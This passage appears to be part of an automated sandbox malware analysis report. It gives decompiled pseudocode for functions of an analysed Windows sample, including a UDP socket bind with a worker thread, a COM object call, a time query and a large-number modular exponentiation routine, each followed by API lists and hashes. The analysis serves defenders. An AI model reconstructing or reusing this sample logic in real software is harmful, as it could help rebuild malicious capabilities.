                                                                                                                                                                                                                                                                                    				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 2, 0x11);
                                                                                                                                                                                                                                                                                    				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                                    				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					E0040DD00(_t24, __edi);
                                                                                                                                                                                                                                                                                    					_t24 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					return _t24;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                                                                                                                                                                                                                    					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DAD0, _t24, 0, 0);
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t24, _t27);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040dd70
                                                                                                                                                                                                                                                                                    0x0040dd82
                                                                                                                                                                                                                                                                                    0x0040dd88
                                                                                                                                                                                                                                                                                    0x0040dd8e
                                                                                                                                                                                                                                                                                    0x0040dd95
                                                                                                                                                                                                                                                                                    0x0040dda1
                                                                                                                                                                                                                                                                                    0x0040dda4
                                                                                                                                                                                                                                                                                    0x0040ddaa
                                                                                                                                                                                                                                                                                    0x0040ddb0
                                                                                                                                                                                                                                                                                    0x0040ddb2
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddbb
                                                                                                                                                                                                                                                                                    0x0040de1a
                                                                                                                                                                                                                                                                                    0x0040de20
                                                                                                                                                                                                                                                                                    0x0040ddbd
                                                                                                                                                                                                                                                                                    0x0040ddbf
                                                                                                                                                                                                                                                                                    0x0040ddc3
                                                                                                                                                                                                                                                                                    0x0040ddc7
                                                                                                                                                                                                                                                                                    0x0040ddcb
                                                                                                                                                                                                                                                                                    0x0040dddb
                                                                                                                                                                                                                                                                                    0x0040dde5
                                                                                                                                                                                                                                                                                    0x0040ddee
                                                                                                                                                                                                                                                                                    0x0040de0e
                                                                                                                                                                                                                                                                                    0x0040de17
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddee

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BF1E,00000000), ref: 0040DD95
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040DDA4
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040DDE5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040DAD0,00000000,00000000,00000000), ref: 0040DE11
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a272f706d971db141aade7e541e5b093828ed65ab25b051faa62c99c8275b329
                                                                                                                                                                                                                                                                                    • Instruction ID: a1f51b83e62fd1e5ac6bfc854ac0cad300f812e19a803ea918e078540f5b95b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a272f706d971db141aade7e541e5b093828ed65ab25b051faa62c99c8275b329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611C870A40300AFE7009FB49C86B577AA0EF44710F50897AFA08DE2D1D2F4D8488756
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C000(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t36 = E00403FB0(_a4, 0, 0);
                                                                                                                                                                                                                                                                                    				_v8 = _t36;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					__imp__#2(_v8);
                                                                                                                                                                                                                                                                                    					_v16 = _t36;
                                                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    						__imp__CoCreateInstance(0x410318, 0, 0x4401, 0x410308,  &_v12);
                                                                                                                                                                                                                                                                                    						if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xfc))))(_v12, 0);
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x120))))(_v12, 0);
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x118))))(_v12, 0);
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x110))))(_v12, 0xffffffff);
                                                                                                                                                                                                                                                                                    							_push( &_v20);
                                                                                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                                                                                    							_push(_v12);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x104))))() != 0 || _v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    								_v12 = 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__#6(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00408C70(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040c006
                                                                                                                                                                                                                                                                                    0x0040c015
                                                                                                                                                                                                                                                                                    0x0040c01d
                                                                                                                                                                                                                                                                                    0x0040c024
                                                                                                                                                                                                                                                                                    0x0040c02e
                                                                                                                                                                                                                                                                                    0x0040c034
                                                                                                                                                                                                                                                                                    0x0040c03b
                                                                                                                                                                                                                                                                                    0x0040c056
                                                                                                                                                                                                                                                                                    0x0040c060
                                                                                                                                                                                                                                                                                    0x0040c077
                                                                                                                                                                                                                                                                                    0x0040c08a
                                                                                                                                                                                                                                                                                    0x0040c09d
                                                                                                                                                                                                                                                                                    0x0040c0b0
                                                                                                                                                                                                                                                                                    0x0040c0b5
                                                                                                                                                                                                                                                                                    0x0040c0b9
                                                                                                                                                                                                                                                                                    0x0040c0c2
                                                                                                                                                                                                                                                                                    0x0040c0cd
                                                                                                                                                                                                                                                                                    0x0040c0e4
                                                                                                                                                                                                                                                                                    0x0040c0e6
                                                                                                                                                                                                                                                                                    0x0040c0e6
                                                                                                                                                                                                                                                                                    0x0040c0cd
                                                                                                                                                                                                                                                                                    0x0040c0f1
                                                                                                                                                                                                                                                                                    0x0040c0f1
                                                                                                                                                                                                                                                                                    0x0040c0fb
                                                                                                                                                                                                                                                                                    0x0040c100
                                                                                                                                                                                                                                                                                    0x0040c109

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FB0: lstrlenA.KERNEL32(00000000), ref: 00403FC7
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0040C02E
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00410318,00000000,00004401,00410308,00000000), ref: 0040C056
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C0F1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeInstancelstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2697797874-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a0839df27600a78392ff93aabca5e88202ddba1a11ed3d88e78accca3d23463
                                                                                                                                                                                                                                                                                    • Instruction ID: 20a4abcab3aa1e453c28a64226875db30f5cadca032c4d12d083da261cb1894b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a0839df27600a78392ff93aabca5e88202ddba1a11ed3d88e78accca3d23463
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9310075A40208EFDB04DB94C895FEEB775AF48700F1082A8E515AB3E0D775AE81CB44
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                    			E0040BE60() {
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				NtQuerySystemTime( &_v12);
                                                                                                                                                                                                                                                                                    				__imp__RtlTimeToSecondsSince1980( &_v12,  &_v16);
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040be6a
                                                                                                                                                                                                                                                                                    0x0040be78
                                                                                                                                                                                                                                                                                    0x0040be84

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                    • RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1987401769-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 455ee2c5fbbf567fcd4195f9b58f1b2e88d94abc591c6772a18d5419c0166664
                                                                                                                                                                                                                                                                                    • Instruction ID: 61a43f963703ead5740a67a36a46c65e70a796bd6fb3fa65a83a1f3e4532f8ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 455ee2c5fbbf567fcd4195f9b58f1b2e88d94abc591c6772a18d5419c0166664
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04D09E7DD0120DABCB00DBE4E9898DDB77CEA44201F0085D5ED1592140EA7466588B95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                    			E00402E90(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                                                                                    				intOrPtr _v580;
                                                                                                                                                                                                                                                                                    				unsigned int _v584;
                                                                                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                                                                                    				intOrPtr _v592;
                                                                                                                                                                                                                                                                                    				intOrPtr _t249;
                                                                                                                                                                                                                                                                                    				signed int _t260;
                                                                                                                                                                                                                                                                                    				signed int _t282;
                                                                                                                                                                                                                                                                                    				signed int _t302;
                                                                                                                                                                                                                                                                                    				signed int _t311;
                                                                                                                                                                                                                                                                                    				signed int _t317;
                                                                                                                                                                                                                                                                                    				signed int _t329;
                                                                                                                                                                                                                                                                                    				signed int _t334;
                                                                                                                                                                                                                                                                                    				signed int _t370;
                                                                                                                                                                                                                                                                                    				unsigned int _t377;
                                                                                                                                                                                                                                                                                    				signed int _t389;
                                                                                                                                                                                                                                                                                    				signed int _t416;
                                                                                                                                                                                                                                                                                    				signed int _t425;
                                                                                                                                                                                                                                                                                    				signed int _t433;
                                                                                                                                                                                                                                                                                    				unsigned int _t441;
                                                                                                                                                                                                                                                                                    				signed int _t443;
                                                                                                                                                                                                                                                                                    				signed int _t445;
                                                                                                                                                                                                                                                                                    				signed int _t446;
                                                                                                                                                                                                                                                                                    				signed int _t448;
                                                                                                                                                                                                                                                                                    				signed int _t449;
                                                                                                                                                                                                                                                                                    				void* _t463;
                                                                                                                                                                                                                                                                                    				void* _t464;
                                                                                                                                                                                                                                                                                    				void* _t465;
                                                                                                                                                                                                                                                                                    				void* _t470;
                                                                                                                                                                                                                                                                                    				void* _t471;
                                                                                                                                                                                                                                                                                    				void* _t472;
                                                                                                                                                                                                                                                                                    				void* _t477;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t341 = _a12;
                                                                                                                                                                                                                                                                                    				_t249 = E00402290(_a12, _a20);
                                                                                                                                                                                                                                                                                    				_t465 = _t464 + 8;
                                                                                                                                                                                                                                                                                    				_v592 = _t249;
                                                                                                                                                                                                                                                                                    				if(_v592 != 0) {
                                                                                                                                                                                                                                                                                    					__eflags = _v592 - 1;
                                                                                                                                                                                                                                                                                    					if(_v592 != 1) {
                                                                                                                                                                                                                                                                                    						_v28 = 0;
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							__eflags = _v28 - 8;
                                                                                                                                                                                                                                                                                    							if(_v28 >= 8) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _v28 - 0x20;
                                                                                                                                                                                                                                                                                    							if(_v28 >= 0x20) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t341 = _v28;
                                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x41634c + _t341 * 4)) - _v592;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(0x41634c + _t341 * 4)) <= _v592) {
                                                                                                                                                                                                                                                                                    								_t334 = _v28 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t334;
                                                                                                                                                                                                                                                                                    								_v28 = _t334;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                                    						if(__eflags > 0) {
                                                                                                                                                                                                                                                                                    							_v44 = _a20 << 1;
                                                                                                                                                                                                                                                                                    							_v48 = E00401400(_t341, _v44);
                                                                                                                                                                                                                                                                                    							_v52 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                                    							_v20 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                                    							_v16 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                                    							_v580 = _a8;
                                                                                                                                                                                                                                                                                    							E00402950(_v580, __eflags, _v20, _v580, _v580, _a16, _a20);
                                                                                                                                                                                                                                                                                    							_t470 = _t465 + 0x24;
                                                                                                                                                                                                                                                                                    							_v64 = 1 << _v28 - 1;
                                                                                                                                                                                                                                                                                    							_v24 = 1;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								_t347 = _v24;
                                                                                                                                                                                                                                                                                    								__eflags = _v24 - _v64;
                                                                                                                                                                                                                                                                                    								if(_v24 >= _v64) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)) = E00401400(_t347, _v44);
                                                                                                                                                                                                                                                                                    								E00402310( *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)), _a20);
                                                                                                                                                                                                                                                                                    								_t477 = _t470 + 0x10;
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									E00401960(_v48, _v20,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                                    									E00401BD0(__eflags, _v52,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                                    									_t477 = _t477 + 0x28;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} while (0 != 0);
                                                                                                                                                                                                                                                                                    								_t329 = _v24 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t329;
                                                                                                                                                                                                                                                                                    								_v24 = _t329;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v56 = 1;
                                                                                                                                                                                                                                                                                    							_t260 = E00402250(_a12, _a20);
                                                                                                                                                                                                                                                                                    							_t471 = _t470 + 8;
                                                                                                                                                                                                                                                                                    							_v588 = _t260;
                                                                                                                                                                                                                                                                                    							_v40 = 0x80000000;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								__eflags = _v40;
                                                                                                                                                                                                                                                                                    								if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t449 = _v588;
                                                                                                                                                                                                                                                                                    								_t317 = _a12;
                                                                                                                                                                                                                                                                                    								__eflags =  *(_t317 + _t449 * 4 - 4) & _v40;
                                                                                                                                                                                                                                                                                    								if(( *(_t317 + _t449 * 4 - 4) & _v40) == 0) {
                                                                                                                                                                                                                                                                                    									_t389 = _v40 >> 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t389;
                                                                                                                                                                                                                                                                                    									_v40 = _t389;
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                                                                    							_v36 = 0;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								__eflags = _v588;
                                                                                                                                                                                                                                                                                    								if(_v588 == 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__eflags = _v56;
                                                                                                                                                                                                                                                                                    								if(_v56 != 0) {
                                                                                                                                                                                                                                                                                    									L29:
                                                                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    										__eflags = _v12;
                                                                                                                                                                                                                                                                                    										if(_v12 > 0) {
                                                                                                                                                                                                                                                                                    											_t433 = _v12 - 1;
                                                                                                                                                                                                                                                                                    											__eflags = _t433;
                                                                                                                                                                                                                                                                                    											_v12 = _t433;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L52:
                                                                                                                                                                                                                                                                                    										__eflags = _v8;
                                                                                                                                                                                                                                                                                    										if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                                                                    												__eflags = _v40 - 1;
                                                                                                                                                                                                                                                                                    												if(_v40 != 1) {
                                                                                                                                                                                                                                                                                    													_t425 = _v40 >> 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t425;
                                                                                                                                                                                                                                                                                    													_v40 = _t425;
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													_v40 = 0x80000000;
                                                                                                                                                                                                                                                                                    													_v588 = _v588 - 1;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                                                                    											} while (0 != 0);
                                                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										__eflags = _v12 - 1;
                                                                                                                                                                                                                                                                                    										if(_v12 >= 1) {
                                                                                                                                                                                                                                                                                    											goto L58;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										__eflags = _v56;
                                                                                                                                                                                                                                                                                    										if(_v56 == 0) {
                                                                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                                                                    												E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                                                                                                                                                                                                                    												E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                                    												_t471 = _t471 + 0x28;
                                                                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                                                                    											} while (0 != 0);
                                                                                                                                                                                                                                                                                    											L57:
                                                                                                                                                                                                                                                                                    											_v8 = 0;
                                                                                                                                                                                                                                                                                    											_v12 = 0;
                                                                                                                                                                                                                                                                                    											goto L58;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										E00402310(_v36, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                                    										_t471 = _t471 + 0xc;
                                                                                                                                                                                                                                                                                    										_v56 = 0;
                                                                                                                                                                                                                                                                                    										goto L57;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t302 = _v588;
                                                                                                                                                                                                                                                                                    									_t370 = _a12;
                                                                                                                                                                                                                                                                                    									__eflags =  *(_t370 + _t302 * 4 - 4) & _v40;
                                                                                                                                                                                                                                                                                    									if(( *(_t370 + _t302 * 4 - 4) & _v40) == 0) {
                                                                                                                                                                                                                                                                                    										L49:
                                                                                                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v8 = 1;
                                                                                                                                                                                                                                                                                    									_v60 = _v40;
                                                                                                                                                                                                                                                                                    									_v32 = _v588;
                                                                                                                                                                                                                                                                                    									_v584 = 1;
                                                                                                                                                                                                                                                                                    									_v24 = 0;
                                                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                                                    										__eflags = _v24 - _v28 - 1;
                                                                                                                                                                                                                                                                                    										if(_v24 >= _v28 - 1) {
                                                                                                                                                                                                                                                                                    											break;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                                                                    											L34:
                                                                                                                                                                                                                                                                                    											__eflags = _v60 - 1;
                                                                                                                                                                                                                                                                                    											if(_v60 != 1) {
                                                                                                                                                                                                                                                                                    												_t443 = _v60 >> 1;
                                                                                                                                                                                                                                                                                    												__eflags = _t443;
                                                                                                                                                                                                                                                                                    												_v60 = _t443;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v60 = 0x80000000;
                                                                                                                                                                                                                                                                                    												_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                                                                                                                    										} while (0 != 0);
                                                                                                                                                                                                                                                                                    										_v584 = _v584 << 1;
                                                                                                                                                                                                                                                                                    										__eflags = _v32;
                                                                                                                                                                                                                                                                                    										if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    											_t446 = _v32;
                                                                                                                                                                                                                                                                                    											_t311 = _a12;
                                                                                                                                                                                                                                                                                    											__eflags =  *(_t311 + _t446 * 4 - 4) & _v60;
                                                                                                                                                                                                                                                                                    											if(( *(_t311 + _t446 * 4 - 4) & _v60) != 0) {
                                                                                                                                                                                                                                                                                    												_t448 = _v584 | 0x00000001;
                                                                                                                                                                                                                                                                                    												__eflags = _t448;
                                                                                                                                                                                                                                                                                    												_v584 = _t448;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t445 = _v24 + 1;
                                                                                                                                                                                                                                                                                    										__eflags = _t445;
                                                                                                                                                                                                                                                                                    										_v24 = _t445;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v12 = _v28 - 1;
                                                                                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                                                                                    										__eflags = _v12;
                                                                                                                                                                                                                                                                                    										if(_v12 <= 0) {
                                                                                                                                                                                                                                                                                    											break;
